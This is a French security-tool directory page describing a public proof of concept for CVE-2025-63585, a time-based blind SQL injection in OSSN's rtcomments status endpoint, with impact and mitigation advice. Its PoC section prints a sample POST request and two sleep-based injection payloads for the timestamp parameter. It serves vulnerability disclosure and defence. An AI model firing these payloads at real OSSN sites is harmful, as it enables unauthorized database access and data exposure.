Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-63585 — Preuve de concept d'une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point d'accès /action/rtcomments/status d'OSSN, démontrant l'exécution de requêtes SQL arbitraires via le paramètre timestamp. | Kitploit
Outils/GitHubGitHub/kgan0509/cve-2025-63585
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité des Bases de Données
GitHubkgan0509/cve-2025-63585

CVE-2025-63585

Preuve de concept d'une vulnérabilité d'injection SQL aveugle basée sur le temps dans le point d'accès /action/rtcomments/status d'OSSN, démontrant l'exécution de requêtes SQL arbitraires via le paramètre timestamp.

Voir le dépôt
2il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-63585

Injection SQL aveugle basée sur le temps dans /action/rtcomments/status (paramètre : timestamp)

Une vulnérabilité d'injection SQL aveugle basée sur le temps a été découverte dans le paramètre timestamp du point de terminaison /action/rtcomments/status. Un attaquant authentifié capable de fournir ce paramètre peut être en mesure d'exécuter des requêtes SQL arbitraires, exposant ou modifiant potentiellement des données sensibles.

Impact : divulgation de données, modification de données, élévation de privilèges, potentiel déni de service (DoS) via des requêtes à délai temporel, (selon les droits de la base de données).

Mitigation : Mettez à niveau OSSN vers la version 8.9 ou ultérieure. De plus, assurez-vous que l'application utilise des requêtes paramétrées/instructions préparées pour tout accès à la base de données, validez strictement l'entrée du timestamp (acceptez uniquement les formats numériques ou ISO attendus), appliquez le principe du moindre privilège pour le compte de base de données, et activez les délais d'attente des requêtes et la journalisation.

Notes : Les charges utiles d'exploitation sont intentionnellement omises pour des raisons de sécurité.

github : https://github.com/opensource-socialnetwork/opensource-socialnetwork/issues/2503

PoC

Send request with method POST '/action/rtcomments/status?guid=18&type=post&ossn_ts=1759741100&ossn_token=c3901a321e755ea3e9956e79eb0fbc7e674f80665725774738b93324699c7c28'

Payload: timestamp=(select*from(select(sleep(10)))a) image

Payload: timestamp=(select*from(select(sleep(30)))a) image

Télécharger l’outil